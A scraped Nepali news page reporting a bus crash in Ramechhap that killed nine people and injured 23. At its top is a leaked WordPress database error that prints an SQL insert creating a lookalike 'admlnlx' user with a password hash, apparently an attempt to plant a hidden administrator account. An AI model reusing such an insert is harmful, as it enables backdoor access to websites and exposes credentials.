WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCcecyuvUpSnR.4Aay9qksenDgVpVV.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 10:58:07', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । रामेछापबाट काठमाडौँ आउँदै गरेको बा३ ख ८३९६ नंको यात्रुवाहक बस जिल्लाको सुनापती गाउँपालिका–५ र खाँडादेवी गाउँपालिका–१ स्थित सिमानामा दुर्घटना हुँदा नौ जनाको मृत्यु भएको छ ।
मृत्यु हुनेमा चार महिला र पाँच पुरुष रहेका तर पहिचान नखुलेको जनाएको छ । उक्त दुर्घटनामा अन्य २३ यात्रु घाइते भएको रामेछापका प्रमुख जिल्ला अधिकारी दीपककुमार पहाडीले राससलाई जानकारी दिए ।
आज बिहान १०ः३० बजे भएको उक्त दुर्घटनामा गम्भीर घाइते भएका तीन जनालाई हेलिकप्टरबाट काठमाडौँ र अन्य घाइतेलाई उपचारका लागि धुलिखेल अस्पताल पठाएको प्रजिअ पहाडीले जानकारी दिए । बस सडकबाट झन्डै ३०÷३५ मिटर तल खसेको छ ।
उहाँका अनुसार दुर्घटनाको कारण भने खुलेको छैन । अहिले उद्धारका लागि प्रहरी टोली परिचालन गरिएको छ । रासस